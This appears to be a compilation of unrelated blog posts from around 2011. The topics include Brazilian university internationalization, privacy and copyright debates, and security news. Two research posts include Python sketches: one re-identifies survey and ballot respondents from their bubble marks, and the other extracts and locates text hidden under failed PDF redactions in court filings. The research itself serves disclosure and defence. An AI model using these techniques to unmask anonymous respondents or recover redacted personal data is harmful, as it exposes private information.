In this sense, João Victor Issler, an economics professor at EPGE (the Graduate School of Economics at Fundação Getulio Vargas), takes a pragmatic view of the issue. He says: “inasmuch as Brazil develops economically, it will inexorably increase the openness of the university system. I am not saying that there should not be specific initiatives to increase internationalization, but an isolated process will be limited. More important than the internationalization of students and faculty is opening the economy to commerce and finance, a process that will directly affect long-term economic development and all its variables: education, innovation and the work force”. João Victor's point is important. If internationalization follows development, there is already some catching up to do. The country has developed significantly in the past 16 years, but that has not been matched by any significant improvement in the internationalization of its universities.
A few strategies might help achieve more openness on the part of Brazilian universities without competing with the goal of expanding access for local students. One is the use of ICTs for international collaboration. Another is providing support for what is already working. But there is more that could be done. Here is a short list:
a) Development organizations such as the World Bank or the Inter-American Development Bank (IDB) can play an important role. Once the internationalization goal is defined, they could provide the necessary support in partnership with local institutions.
b) Pay attention to the basics: create dedicated offices to centralize support for international students and faculty. They should be responsible for strategy, but also help with practical matters such as visas, travel, and coping with the local bureaucracy.
c) Make university websites accessible in English. The majority of Brazilian universities' websites are only in Portuguese. Even the webpage of the International Cooperation Commission at the University of Sao Paulo is mostly in Portuguese, and many of its English links are broken.
d) Increase the use of Information and Communication Technologies (ICTs) as a tool for cooperation and for integrating students and faculty into international projects. Expanding distance learning programs and cooperation mediated by ICTs is a no-brainer.
e) Create a prize system for internationalization projects, to be awarded every few years to the educational institution that best advanced that goal.
f) Consider offering tax breaks to the private sector (which might include private universities) in exchange for developing successful research centers that include an international component.
g) Brazilian organizations funding research should seek to increase support to international researchers and professors who would like to develop projects in Brazil.
h) Regional integration is the low-hanging fruit. Attracting the best students from other Latin American countries is an opportunity to kickstart international cooperation.
i) Map what is already in place, identifying what is working in terms of internationalization and supporting its expansion.
j) Brazil needs an innovation research lab. Large investment packages, such as the government support for Foxconn's new plant, should include integration with universities and the creation of a public/private research center focused on innovation.
Below are the complete interviews with Volker Grassmuck and João Victor Issler, with their perspectives on the issue.
Interview with Volker Grassmuck
Volker is currently a lecturer at Paderborn University. He spent 18 months in Brazil as a visiting researcher affiliated with the University of Sao Paulo. His visit contributed significantly to the Brazilian copyright reform debate. He partnered with local researchers and law professors (as well as artists and NGOs) to develop an innovative compensation system for artists, which has become part of that debate.
1) How well prepared do you think Brazilian universities are to receive students and professors/researchers from abroad?
I did not experience any special provisions for foreigners at USP. The inviting professor has to navigate university bureaucracy for the visiting researcher just as for any Brazilian researcher. I did experience a number of bizarre situations, but these were not specific to me, but the same for all in our research group.
E.g.: In order to receive my grant I was forced to open an account with the only bank that has an office on the USP Leste campus. The money from the Ford Foundation was already there, and it was exactly the same amount that was supposed to be transferred to my account on the same day of each month. But every single month I had to remind the person in our group in charge of administrative issues that the money had not arrived. She would then go to the university administration to pick up a check that physically had to be carried to the bank and deposited there. If the single person in the administration in charge was ill, this would be delayed until that person came back.
Another path a foreigner can pursue is to apply for a professorship at a Brazilian university. I looked into this while I was there and got advice from a few people who had actually done it. The prerequisite would be a “revalidation” of my German Ph.D. This is a long procedure, requiring originals and copies of the diploma, grades etc. authenticated by the Brazilian Consulate, a copy of the dissertation, maybe even a translation into Portuguese, an examination similar to the original Ph.D. examination plus some extras (e.g. “didactics”) that you don’t have at a German university, and a fee, in the case of USP, of R$ 1,530.00. In other words, Brazilian academia does not trust the Free University of Berlin to issue valid Ph.D.s and requires me to essentially go through the whole Ph.D. procedure all over again. And then I would be able to take a “public competition”, which is yet another procedure unlike anything required by a German university.
2) What is the situation in German universities? Are they prepared for, and do they receive, foreign students and professors/researchers?
Being German, I have not experienced being a foreign student or researcher here. But here are some impressions: when I started teaching at Paderborn University, which is a young (founded in 1972), mid-sized (15,000 students) university in a small town, the first time I walked across campus I heard Indian, Vietnamese, Chinese, Arabic, Turkish and Spanish. At USP, during the entire year, I never heard anything but Portuguese, except in the language course, where there were people from other Latin American countries, two women from Spain, and one visiting researcher from the US. Staff at Paderborn is less international, but once or twice a week there is a presentation by a guest speaker from a university in Europe or beyond.
This is anecdotal, of course. I’m sure objective numbers would show a different picture. The Centrum für Hochschulentwicklung (CHE) does a regular ranking of German universities, which includes their international orientation. This year’s result: the business faculties at universities of applied sciences are leading with 50%. Only 35% of universities were ranked as internationally oriented, with sociology and political science being the weakest. http://www.che-ranking.de/
I wonder how Brazilian universities would rank by the same standards.
3) Do you think there is a connection between innovation and foreign students at local universities?
No doubt about it. I did see an international orientation in two forms: 1. People read the international literature in the fields I’m interested in. But without actual people to enter into a dialogue with, this often remains a reproduction, or at best an application to Brazil, of innovations made elsewhere. 2. People travel and study abroad. A few students and professors travel extensively. Some students from our group went to Bolivia, Mozambique, and France during my year there. So there is a certain internationalization “from Brazil”, but my overwhelming impression was that there is very little academic internationalization “of Brazil”.
Interview with João Victor Issler
Joao Victor Issler is an economics professor at the Fundacao Getulio Vargas Graduate School of Economics who has been closely following the recent internationalization efforts. His full bio is here.
a) How do you see the presence of international students and faculty at the Brazilian universities?
The presence of both is quite rare. There are a few isolated efforts here and there by a few groups. For example, in Economics, we have PUC-Rio (Pontifical Catholic University in Rio) and IMPA (National Institute for Pure and Applied Mathematics), which have master's and Ph.D. students from Argentina, Chile, Peru, etc. Our school, EPGE (FGV Graduate School of Economics), hires professors from outside Brazil, but we do not have specific incentives for international students. Beyond Economics, I know that the University of Sao Paulo is seeking to attract international students, but it is hard to tell in which schools and how many.
b) Foxconn announced it will open a new plant in Brazil and will hire 20,000 engineers for it. We clearly don't have that many engineers. Do you think that the internationalization of universities could help the country build the capacity to develop its tech industry?
The announced numbers cannot be trusted. In any case, the general perception is that there is a shortage of engineers in Brazil. The tech market, however, is an endogenous variable, correlated with our GDP per capita, the education level of the work force, the number of houses with access to drinkable water, infrastructure, etc. Inasmuch as Brazil develops economically, it will inexorably increase the openness of the university system. I am not saying that there should not be specific initiatives to increase internationalization, but an isolated process will be limited. More important than the internationalization of students and faculty is opening the economy to commerce and finance, a process that will directly affect long-term economic development and all its variables: education, innovation and the work force.
c) In other countries, there are institutions such as the Goethe Institute, or the Humboldt Foundation in Germany, that end up attracting international talents. The same goes for the US, with the Fulbright program. Why not in Brazil?
Germany and other European countries face problems due to the shape of their demographic pyramid, whose base is small compared to the top. They have the capacity to offer university places that go beyond German students. Thus, it is possible to attract international students in order to fill the existing capacity. It is hard to say how this structure will evolve: they might reduce the installed capacity, or intensify the search for international students. And they are looking for Brazilian students, for instance, especially engineers. Generally, developed countries tend to attract better (and wealthier) students than developing countries do, which explains this movement toward Germany, the US or Canada. To me, the US is the most important model for the higher-education industry. At the beginning of the 20th century, there were already many Japanese and Chinese students at universities in the US and Europe. With the development of Japan, this movement decreased toward the end of the century. Brazil today (for instance, the University of Sao Paulo) attracts a few good students from Latin America, and it could attract more if we develop faster than the rest of the region. In Brazil, CAPES (for which I was an advisor until recently) plays a role similar to the institutions you mentioned. They are engaged in several bilateral agreements for students and professors. This openness is certainly positive. For students and professors, it is important to consider the hierarchy of quality: the best students tend to go to the US and Europe, we end up with the middle, and others go to countries where the development level is lower. As I mentioned, I don’t believe it is possible to change this pattern unilaterally, unless we want to apply huge public resources to it. In my view, it is not a priority, given the current levels of subsidies already applied to higher education in comparison with fundamental education in Brazil.
d) In your opinion, and considering the experience of EPGE, what are the advantages or disadvantages of increasing internationalization at Brazilian universities? Would it reduce space for Brazilians?
Increasing the universe of choice always improves the final result. Therefore, I see only advantages, and I don’t see how we can be against internationalization. However, as I mentioned, I believe a unilateral process will have only limited power to change higher education in Brazil (and also its impact on innovation and technology). Opening universities might not reduce the places for Brazilians, provided it is an organized and planned movement, correlated with our development level. If it is unilateral, then there can indeed be a loss for Brazilian students and professors.
e) Finally, do you see a relation between innovation and the internationalization of universities?
Yes, I do think the relation between the two variables is positive, but I don’t think either of them can be treated in isolation.
While iCloud was still in beta, Rafael Rivera (the Within Windows blogger) worked with Paul Paliath at Infinite Apple to analyze iCloud traffic:
Last week, we posted some screenshots showing what appeared to be Apple’s new iCloud-backed iMessage using Azure (and Amazon) services for hosting. Since then, GigaOM ran the screenshots through three “cloud and networking experts at major companies” and the trio dismissed our claims.
Looking at the screenshots, it’s obvious Charles was used to dump iCloud traffic. Working with Within Windows blogger Rafael Rivera, we were able to set up a similar configuration with proper SSL sniffing capabilities — a setup that cloud and networking experts could have put together in minutes.
We sent an image from and to iPhones running a beta copy of iOS 5. The resulting traffic showed, quite clearly, the use of Azure services for hosting purposes. We don’t believe iCloud stores actual content. Rather, it simply manages links to uploaded content.
Full story and opinion at Paul Thurrott’s blog:
Confirmed Apple iCloud Does Not Stand Alone - SuperSite Blog

Microsoft saw a sharp drop in malware infections that exploit a widely abused Windows Autorun feature almost immediately after it was automatically disabled in earlier versions of the operating system.…
Earlier this week, Facebook expanded the roll-out of its facial recognition software to tag people in photos uploaded to the social networking site. Many observers and regulators responded with privacy concerns; EFF offered a video showing users how to opt-out.
Tim O'Reilly, however, takes a different tack:
Face recognition is here to stay. My question is whether to pretend that it doesn't exist, and leave its use to government agencies, repressive regimes, marketing data mining firms, insurance companies, and other monolithic entities, or whether to come to grips with it as a society by making it commonplace and useful, figuring out the downsides, and regulating those downsides.
...We need to move away from a Maginot-line like approach where we try to put up walls to keep information from leaking out, and instead assume that most things that used to be private are now knowable via various forms of data mining. Once we do that, we start to engage in a question of what uses are permitted, and what uses are not.
O'Reilly's point -- and face-recognition technology -- is bigger than Facebook. Even if Facebook swore off the technology tomorrow, it would still be out there, and likely used against us unless regulated. Yet we can't decide on the proper scope of regulation without understanding the technology and its social implications.
By taking these latent capabilities (Riya was demonstrating them years ago; the NSA probably had them decades earlier) and making them visible, Facebook gives us more feedback on the privacy consequences of the tech. If part of that feedback is "ick, creepy" or worse, we should feed that into regulation for the technology's use everywhere, not just in Facebook's interface. Merely hiding the feature in the interface, while leaving it active in the background would be deceptive: it would give us a false assurance of privacy. For all its blundering, Facebook seems to be blundering in the right direction now.
Compare the furor around Dropbox's disclosure "clarification". Dropbox had claimed that "All files stored on Dropbox servers are encrypted (AES-256) and are inaccessible without your account password," but recently updated that to the weaker assertion: "Like most online services, we have a small number of employees who must be able to access user data for the reasons stated in our privacy policy (e.g., when legally required to do so)." Dropbox had signaled "encrypted": absolutely private, when it meant only relatively private. Users who acted on the assurance of complete secrecy were deceived; now those who know the true level of relative secrecy can update their assumptions and adapt behavior more appropriately.
Privacy-invasive technology and the limits of privacy-protection should be visible. Visibility feeds more and better-controlled experiments to help us understand the scope of privacy, publicity, and the space in between (which Woody Hartzog and Fred Stutzman call "obscurity" in a very helpful draft). Then, we should implement privacy rules uniformly to reinforce our social choices.
The security of Google Android has once again been called into question after an academic researcher discovered 12 malicious apps hosted in the operating system's official applications market, some that had been hosted there for months and racked up hundreds of thousands of downloads.…
Updated Sophos has apologised after its security screening technology went awry and began falsely warning users when they visited websites running Google Analytics.…
A PC repair technician has been charged with planting spyware on the machines of clients as part of a ruse designed to capture pictures of them in various states of undress.…
Advance Notification Service information on 16 bulletins (nine Critical in severity, seven Important) addressing 34 vulnerabilities in Microsoft Windows, Microsoft Office, Internet Explorer, .NET, SQL, Visual Studio, Silverlight and ISA. All bulletins will be released on Tuesday, June 14, at approximately 10am PDT. Come back to this blog on Tuesday for our official risk and impact analysis, along with deployment guidance and a video overview of the release.
One of the issues we start to address in this release is “cookiejacking,” which allows an attacker to steal cookies from a user’s computer and access websites the user has logged into. The Internet Explorer bulletin will address one of the known vectors to the cookie folder. Given the prevalence of other types of social engineering methods in use by criminals, which provide access to much more than cookies, we believe this issue poses lower risk to customers. Further, based on a signature that has been released to millions of Microsoft Security Essentials and Forefront customers, the Microsoft Malware Protection Center (MMPC) has not detected attempts to use this technique.
June Advance Notification Service
Today, Joe Calandrino, Ed Felten and I are releasing a new result regarding the anonymity of fill-in-the-bubble forms. These forms, popular for their use with standardized tests, require respondents to select answer choices by filling in a corresponding bubble. Contradicting a widespread implicit assumption, we show that individuals create distinctive marks on these forms, allowing use of the marks as a biometric. Using a sample of 92 surveys, we show that an individual's markings enable unique re-identification within the sample set more than half of the time. The potential impact of this work is as diverse as use of the forms themselves, ranging from cheating detection on standardized tests to identifying the individuals behind “anonymous” surveys or election ballots.
If you've taken a standardized test or voted in a recent election, you’ve likely used a bubble form. Filling in a bubble doesn't provide much room for inadvertent variation. As a result, the marks on these forms superficially appear to be largely identical, and minor differences may look random and not replicable. Nevertheless, our work suggests that individuals may complete bubbles in a sufficiently distinctive and consistent manner to allow re-identification. Consider the following bubbles from two different individuals:
[Images: two sample bubbles, one marked by each respondent]
These individuals have visibly different stroke directions, suggesting a means of distinguishing between both individuals. While variation between bubbles may be limited, stroke direction and other subtle features permit differentiation between respondents. If we can learn an individual's characteristic features, we may use those features to identify that individual's forms in the future.
To test the limits of our analysis approach, we obtained a set of 92 surveys and extracted 20 bubbles from each of those surveys. We set aside 8 bubbles per survey to test our identification accuracy and trained our model on the remaining 12 bubbles per survey. Using image processing techniques, we identified the unique characteristics of each training bubble and trained a classifier to distinguish between the surveys’ respondents. We applied this classifier to the remaining test bubbles from a respondent. The classifier orders the candidate respondents based on the perceived likelihood that they created the test markings. We repeated this test for each of the 92 respondents, recording where the correct respondent fell in the classifier’s ordered list of candidate respondents.
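For readers who want a feel for the train-and-rank loop, here is a rough Python sketch using scikit-learn. It is not the code behind the paper: our feature extraction is far more careful (stroke direction and other subtle features) than the flattened pixels used here, and the `bubbles` data layout is purely hypothetical.

```python
import numpy as np
from sklearn.ensemble import RandomForestClassifier

def flatten(img):
    """Turn a small grayscale bubble image (2-D array) into a feature vector."""
    return np.asarray(img, dtype=float).ravel()

def train_classifier(bubbles, n_train=12):
    """bubbles: dict mapping respondent id -> list of bubble images."""
    X, y = [], []
    for respondent, images in bubbles.items():
        for img in images[:n_train]:           # 12 training bubbles per survey
            X.append(flatten(img))
            y.append(respondent)
    clf = RandomForestClassifier(n_estimators=200, random_state=0)
    clf.fit(np.array(X), np.array(y))
    return clf

def rank_candidates(clf, test_images):
    """Order candidate respondents by how likely they made the test bubbles."""
    probs = clf.predict_proba([flatten(img) for img in test_images])
    combined = probs.mean(axis=0)              # pool evidence across the 8 test bubbles
    order = np.argsort(combined)[::-1]
    return [(clf.classes_[i], combined[i]) for i in order]
```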
If bubble marking patterns were completely random, a classifier could do no better than randomly guessing a test set’s creator, with an expected accuracy of 1/92 ≈ 1%. Our classifier achieves over 51% accuracy. The classifier is rarely far off: the correct answer falls in the classifier’s top three guesses 75% of the time (vs. 3% for random guessing) and its top ten guesses more than 92% of the time (vs. 11% for random guessing). We conducted a number of additional experiments exploring the information available from marked bubbles and potential uses of that information. See our paper for details.
Additional testing---particularly using forms completed at different times---is necessary to assess the real-world impact of this work. Nevertheless, the strength of these preliminary results suggests both positive and negative implications depending on the application. For standardized tests, the potential impact is largely positive. Imagine that a student takes a standardized test, performs poorly, and pays someone to repeat the test on his behalf. Comparing the bubble marks on both answer sheets could provide evidence of such cheating. A similar approach could detect third-party modification of certain answers on a single test.
The possible impact on elections using optical scan ballots is more mixed. One positive use is to detect ballot box stuffing---our methods could help identify whether someone replaced a subset of the legitimate ballots with a set of fraudulent ballots completed by herself. On the other hand, our approach could help an adversary with access to the physical ballots or scans of them to undermine ballot secrecy. Suppose an unscrupulous employer uses a bubble form employment application. That employer could test the markings against ballots from an employee’s jurisdiction to locate the employee’s ballot. This threat is more realistic in jurisdictions that release scans of ballots.
Appropriate mitigation of this issue is somewhat application specific. One option is to treat surveys and ballots as if they contain identifying information and avoid releasing them more widely than necessary. Alternatively, modifying the forms to mask marked bubbles can remove identifying information but, among other risks, may remove evidence of respondent intent. Any application demanding anonymity requires careful consideration of options for preventing creation or disclosure of identifying information. Election officials in particular should carefully examine trade-offs and mitigation techniques if releasing ballot scans.
This work provides another example in which implicit assumptions resulted in a failure to recognize a link between the output of a system (in this case, bubble forms or their scans) and potentially sensitive input (the choices made by individuals completing the forms). Joe discussed a similar link between recommendations and underlying user transactions two weeks ago. As technologies advance or new functionality is added to systems, we must explicitly re-evaluate these connections. The release of scanned forms combined with advances in image analysis raises the possibility that individuals may inadvertently tie themselves to their choices merely by how they complete bubbles. Identifying such connections is a critical first step in exploiting their positive uses and mitigating negative ones.
This work will be presented at the 2011 USENIX Security Symposium in August.
A Rustock botnet suspect has aspirations to work at Google, according to a nice piece of cyber-sleuthing by ex-Washington Post reporter Brian Krebs.…
It’s historically been the case that papers published in an IEEE or ACM conference or journal must have their copyrights assigned to the IEEE or ACM, respectively. Most of us were happy with this sort of arrangement, but the new IEEE policy seems to apply more restrictions on this process. Matt Blaze blogged about this issue in particular detail.
The IEEE policy and the comparable ACM policy appear to be focused on creating revenue opportunities for these professional societies. Hypothetically, that income should result in cost savings elsewhere (e.g., lower conference registration fees) or in higher quality member services (e.g., paying the expenses of conference program committee members to attend meetings). In practice, neither of these is true. Regardless, our professional societies work hard to keep a paywall between our papers and their readership. Is this sort of behavior in our best interests? Not really.
What benefits the author of an academic paper? In a word, impact. Papers that are more widely read are more widely influential. Furthermore, widely read papers are more widely cited; citation counts are explicitly considered in hiring, promotion, and tenure cases. Anything that gets in the way of a paper’s impact is something that damages our careers and it’s something we need to fix.
There are three common solutions. First, we ignore the rules and post copies of our work on our personal, laboratory, and/or departmental web pages. Virtually any paper written in the past ten years can be found online, without cost, and conveniently cataloged by sites like Google Scholar. Second, some authors I’ve spoken to will significantly edit the copyright assignment forms before submitting them. Nobody apparently ever notices this. Third, some professional societies, notably the USENIX Association, have changed their rules. The USENIX policy completely inverts the relationship between author and publisher. Authors grant USENIX certain limited and reasonable rights, while the authors retain copyright over their work. USENIX then posts all the papers on its web site, free of charge; authors are free to do the same on their own web sites.
(USENIX ensures that every conference proceedings has a proper ISBN number. Every USENIX paper is just as “published” as a paper in any other conference, even though printed proceedings are long gone.)
Somehow, the sky hasn’t fallen. So far as I know, the USENIX Association’s finances still work just fine. Perhaps it’s marginally more expensive to attend a USENIX conference, but then the service level is also much higher. The USENIX professional staff do things that are normally handled by volunteer labor at other conferences.
This brings me to the vote we had last week at the IEEE Symposium on Security and Privacy (the “Oakland” conference) during the business meeting. We had an unusually high attendance (perhaps 150 out of 400 attendees) as there were a variety of important topics under discussion. We spent maybe 15 minutes talking about the IEEE’s copyright policy, and the resolution before the room was: should we reject the IEEE copyright policy and adopt the USENIX policy? Ultimately, there were two “no” votes and everybody else voted “yes.” That’s an overwhelming statement.
The question is what happens next. I’m planning to attend ACM CCS this October in Chicago and I expect we can have a similar vote there. I hope similar votes can happen at other IEEE and ACM conferences. Get it on the agenda of your business meetings. Vote early and vote often! I certainly hope the IEEE and ACM agree to follow the will of their membership. If the leadership don’t follow the membership, then we’ve got some more interesting problems that we’ll need to solve.
Sidebar: ACM and IEEE make money by reselling our work, particularly with institutional subscriptions to university libraries and large companies. As an ACM or IEEE member, you also get access to some, but not all, of the online library contents. If you make everything free (as in free beer), removing that revenue source, then you’ve got a budget hole to fill. While I’m no budget wizard, it would make sense for our conference registration fees to support the archival online storage of our papers. Add in some online advertising (example: startup companies, hungry to hire engineers with specialized talents, would pay serious fees for advertisements adjacent to research papers in the relevant areas), and I’ll bet everything would work out just fine.
After years of work, the world is taking a step toward letting authors own and control their own documents, instead of having them controlled by office document software vendors.
Historically, every office document suite has stored data in its own incompatible format, locking users into that suite and inhibiting competition. This lack of a free and open office document format also makes a lie out of archiving; storing the bits is irrelevant because formats change over time in undocumented ways, with the result that later programs often cannot read older files (we can still read the Magna Carta, but some PowerPoint files I created only 15 years ago cannot be read by current versions of Microsoft Office). Governments in particular should not have their documents beholden to any supplier; important government documents should be available to future generations.
Thankfully, the OASIS Open Document Format for Office Applications (OpenDocument) Technical Committee (TC) is wrapping up its update of the OpenDocument standard, and I think they are about to complete the new version 1.2. This standard lets people store and exchange editable office documents so that they can be edited by programs made by different suppliers. This will enable real competition, and enable future generations to read the materials we develop today. The TC has already approved OpenDocument v1.2 as a Committee Specification, and at this point I think the odds are excellent that it will get through the rest of the process and become formally approved.
One of the big improvements, from my point of view, is that the TC has successfully defined how to store and exchange recalculated formulas in office documents. That was my goal for joining the TC years ago, and I’m delighted to have played a part in this update. Since it looks like it’s on its way to success, I plan to step down as chair of the OASIS Office formula subcommittee and to leave the TC. I am very grateful to everyone who helped — thank you. For those who aren’t familiar with the story of the formula subcommittee, please let me give a brief background.
Years ago I was delighted to see a standard way to store office documents and exchange them between different suppliers’ products: OASIS Open Document Format for Office Applications (OpenDocument). People around the world create office documents, so this is a standard the world really needed!! However, I was deeply troubled when I discovered that this specification did not include a standard way to exchange recalculated formulas, such as those used in spreadsheets. I thought this was an important weakness in the specification. So I talked to others to see what could be done, and started work that might fill this void, including recruiting people to help.
I am delighted to report that we now have a specification for formulas: OpenFormula, part 2 of the current draft of the OpenDocument standard. Now the world has a standard, developed by multiple suppliers, that lets people store office documents for future generations and exchange office documents between different suppliers’ products, that includes recalculated formulas. And it’s not just a spec; people are already implementing it (which is good; only implemented specs have value). There are still some procedural steps, but I have high hopes that at this point we are essentially done.
This work was not done by just me, of course, or even primarily by me. A vast number of people worked directly and behind the scenes to make it happen. I cannot possibly list them all. I can, however, express my great gratitude to them. Thank you, thank you, thank you. You — and there are many of you — have made this a success. Again, thank you so very much.
The reason I joined the OASIS technical committee (TC) was to help create this formula specification and turn it into a reality. Making a real standard, one agreed on by multiple parties, takes a lot of work. We developers of the formula specification discussed details such as what 0 to the 0 power should mean, date basis systems, unit systems, and many other details like that, because addressing detailed issues is necessary to create a good standard. We had to nail down evaluation order and determine that a light-year is the distance light travels in exactly 365.25 days. And so on. We got a lot of participation by various spreadsheet suppliers; implementers even changed their implementations to conform with the draft spec as it was being developed! This work took time, but the point was to create a specification people would actually use, not just put on a shelf, and that made the extra time worth it. If you are interested in learning more, feel free to listen to The ODF Podcast 004: David A. Wheeler on OpenFormula (an interview of me by Rob Weir).
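As a small illustration of why such details matter, fixing the light-year to exactly 365.25 days pins it to a single exact value that every conforming implementation must agree on:

```latex
\[
1~\text{light-year} = c \times 365.25 \times 86400~\text{s}
                    = 299\,792\,458~\tfrac{\text{m}}{\text{s}} \times 31\,557\,600~\text{s}
                    = 9\,460\,730\,472\,580\,800~\text{m}.
\]
```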
Now, finally, that work appears to be done. As I noted, there are a few procedural steps before the current specification becomes an official standard; change is always possible. Also, I’m sure there will be clarifications and additions over time, as with any standard in use. But at this point, I think my goal has been accomplished, and I am grateful.
So, I think now is a good time for me to make a graceful exit from the TC. After all, my goal has been accomplished. I intend to step down as chair of the formula subcommittee and to leave the TC. Technically there are still some procedural steps and there's a potential for issues; if there's a need for me to help wrap something up, I'll do so. But I think things are concluding, so it's a good time to say so.
I think the effort to specify spreadsheet formulas has been a great success. We got a lot accomplished. Most importantly, we got something important accomplished for the world. Thank you, everyone who helped.
Since we launched RECAP a couple of years ago, one of our top concerns has been privacy. The federal judiciary's PACER system offers the public online access to hundreds of millions of court records. The judiciary's rules require each party in a case to redact certain types of information from documents they submit, but unfortunately litigants and their counsel don't always comply with these rules. Three years ago, Carl Malamud did a groundbreaking audit of PACER documents and found more than 1600 cases in which litigants submitted documents with unredacted Social Security numbers. My recent research has focused on a different problem: cases where parties tried to redact sensitive information but the redactions failed for technical reasons. This problem occasionally pops up in news stories, but as far as I know, no one has conducted a systematic study.
To understand the problem, it helps to know a little bit about how computers represent graphics. The simplest image formats are bitmap or raster formats. These represent an image as an array of pixels, with each pixel having a color represented by a numeric value. The PDF format uses a different approach, known as vector graphics, which represents an image as a series of drawing commands: lines, rectangles, lines of text, and so forth.
Vector graphics have important advantages. Vector-based formats "scale up" gracefully, in contrast to the raster images that look "blocky" at high resolutions. Vector graphics also do a better job of preserving a document's structure. For example, text in a PDF is represented by a sequence of explicit text-drawing commands, which is why you can cut and paste text from a PDF document, but not from a raster format like PNG.
But vector-based formats also have an important disadvantage: they may contain more information than is visible to the naked eye. Raster images have a "what you see is what you get" quality—changing all the pixels in a particular region to black destroys the information that was previously in that part of the image. But a vector-based image can have multiple "layers." There might be a command to draw some text followed by a command to draw a black rectangle over the text. The image might look like it's been redacted, but the text is still "under" the box. And often extracting that information is a simple matter of cutting and pasting.
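To see how little "extracting that information" can take, here is a minimal Python sketch. It assumes the PyMuPDF library (imported as `fitz`) is installed and that `redacted_filing.pdf` is a hypothetical vector-based PDF with a black box drawn over text; any tool that walks the text-drawing commands will report the same thing.

```python
import fitz  # PyMuPDF; one of several libraries that expose a PDF's text layer

# Hypothetical file: a filing where a black rectangle was drawn over sensitive text.
doc = fitz.open("redacted_filing.pdf")

for page in doc:
    # get_text() replays the text-drawing commands, so it returns the text even
    # when a filled rectangle was painted over it in a later "layer" of the page.
    print(page.get_text("text"))
```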
So how many PACER documents have this problem? We're in a good position to study this question because we have a large collection of PACER documents—1.8 million of them when I started my research last year. I wrote software to detect redaction rectangles—it turns out these are relatively easy to recognize based on their color, shape, and the specific commands used to draw them. Out of 1.8 million PACER documents, there were approximately 2000 documents with redaction rectangles. (There were also about 3500 documents that were redacted by replacing text with strings of Xes. I also excluded documents that were redacted by Carl Malamud before he donated them to our archive.)
Next, my software checked to see if these redaction rectangles overlapped with text. My software identified a few hundred documents that appeared to have text under redaction rectangles, and examining them by hand revealed 194 documents with failed redactions. The majority of the documents (about 130) appear to be from commercial litigation, in which parties have unsuccessfully attempted to redact trade secrets such as sales figures and confidential product information. Other improperly redacted documents contain sensitive medical information, addresses, and dates of birth. Still others contain the names of witnesses, jurors, plaintiffs, and one minor.
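The scripts I wrote are Perl code built on CAM::PDF (more on that below), but the two-step idea carries over to other PDF toolkits. Here is a rough Python sketch of it using PyMuPDF, not the code we're releasing: collect the black filled rectangles on each page, then flag words whose bounding boxes intersect one of them. A real tool also needs the color, shape, and drawing-command heuristics described above to keep false alarms down.

```python
import fitz  # PyMuPDF; a stand-in here for the CAM::PDF-based Perl scripts

def suspicious_redactions(path):
    """Flag words that lie under black filled rectangles in a PDF's text layer."""
    findings = []
    doc = fitz.open(path)
    for page in doc:
        # Candidate redaction boxes: rectangles drawn with a solid black fill.
        boxes = [
            fitz.Rect(item[1])
            for drawing in page.get_drawings()
            if drawing.get("fill") == (0.0, 0.0, 0.0)
            for item in drawing["items"]
            if item[0] == "re"
        ]
        # Words whose bounding boxes intersect a candidate box are suspect.
        for x0, y0, x1, y1, word, *_ in page.get_text("words"):
            if any(fitz.Rect(x0, y0, x1, y1).intersects(box) for box in boxes):
                findings.append((page.number, word))
    return findings

if __name__ == "__main__":
    for page_number, word in suspicious_redactions("redacted_filing.pdf"):
        print(page_number, word)
```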
PACER reportedly contains about 500 million documents. We don't have a random sample of PACER documents, so we should be careful about trying to extrapolate to the entire PACER corpus. Still, it's safe to say there are thousands, and probably tens of thousands, of documents in PACER whose authors made unsuccessful attempts to conceal information.
It's also important to note that my software may not be detecting every instance of redaction failures. If a PDF was created by scanning in a paper document (as opposed to generated directly from a word processor), then it probably won't have a "text layer." My software doesn't detect redaction failures in this type of document. This means that there may be more than 194 failed redactions among the 1.8 million documents I studied.
A few weeks ago I wrote a letter to Judge Lee Rosenthal, chair of the federal judiciary's Committee on Rules of Practice and Procedure, explaining this problem. In that letter I recommend that the courts themselves use software like mine to automatically scan PACER documents for this type of problem. In addition to scanning the documents they already have, the courts should make it a standard part of the process for filing new documents with the courts. This would allow the courts to catch these problems before the documents are made available to the public on the PACER website.
My code is available here. It's experimental research code, not a finished product. We're releasing it into the public domain using the CC0 license; this should make it easy for federal and state officials to adapt it for their own use. Court administrators who are interested in adapting the code for their own use are especially encouraged to contact me for advice and assistance. The code relies heavily on the CAM::PDF Perl library, and I'm indebted to Chris Dolan for his patient answers to my many dumb questions.
So what should litigants do to avoid this problem? The National Security Agency has a good primer on secure redaction. The approach they recommend—completely deleting sensitive information in the original word processing document, replacing it with innocuous filler (such as strings of XXes) as needed, and then converting it to a PDF—is the safest. The NSA primer also explains how to check for other potentially sensitive information that might be hidden in a document's metadata.
Of course, there may be cases where this approach isn't feasible because a litigant doesn't have the original word processing document or doesn't want the document's layout to be changed by the redaction process. Adobe Acrobat's redaction tool has worked correctly when we've used it, and Adobe probably has the expertise to do it correctly. There may be other tools that work correctly, but we haven't had an opportunity to experiment with them so we can't say which ones they might be.
Regardless of the tool used, it's a good idea to take the redacted document and double-check that the information was removed. An easy way to do this is to simply cut and paste the "redacted" content into another document. If the redaction succeeded, no text should be transferred. This method will catch most, but not all, redaction failures. A more rigorous check is to remove the redaction rectangles from the document and manually observe what's underneath them. One of the scripts I'm releasing today, called remove_rectangles.pl, does just that. In its current form, it's probably not user-friendly enough for non-programmers to use, but it would be relatively straightforward for someone (perhaps Adobe or the courts) to build a user-friendly version that ordinary users could use to verify that the document they just attempted to redact actually got redacted.
One approach we don't endorse is printing the document out, redacting it with a black marker, and then re-scanning it to PDF format. Although this may succeed in removing the sensitive information, we don't recommend this approach because it effectively converts the document into a raster-based image, destroying useful information in the process. For example, it will no longer be possible to cut and paste (non-redacted) text from a document that has been redacted in this way.
Bad redactions are not a new problem, but they are taking on a new urgency as PACER documents become increasingly available on the web. Correct redaction is not difficult, but it does require both knowledge and care by those who are submitting the documents. The courts have several important roles they should play: educating attorneys about their redaction responsibilities, providing them with software tools that make it easy for them to comply, and monitoring submitted documents to verify that the rules are being followed.
This research was made possible with the financial support of Carl Malamud's organization, Public.Resource.Org.
Attachment | Size
---|---
rosenthal_redacted.pdf | 138.38 KB
Ann Kilzer, Arvind Narayanan, Ed Felten, Vitaly Shmatikov, and I have released a new research paper detailing the privacy risks posed by collaborative filtering recommender systems. To examine the risk, we use public data available from Hunch, LibraryThing, Last.fm, and Amazon in addition to evaluating a synthetic system using data from the Netflix Prize dataset. The results demonstrate that temporal changes in recommendations can reveal purchases or other transactions of individual users.
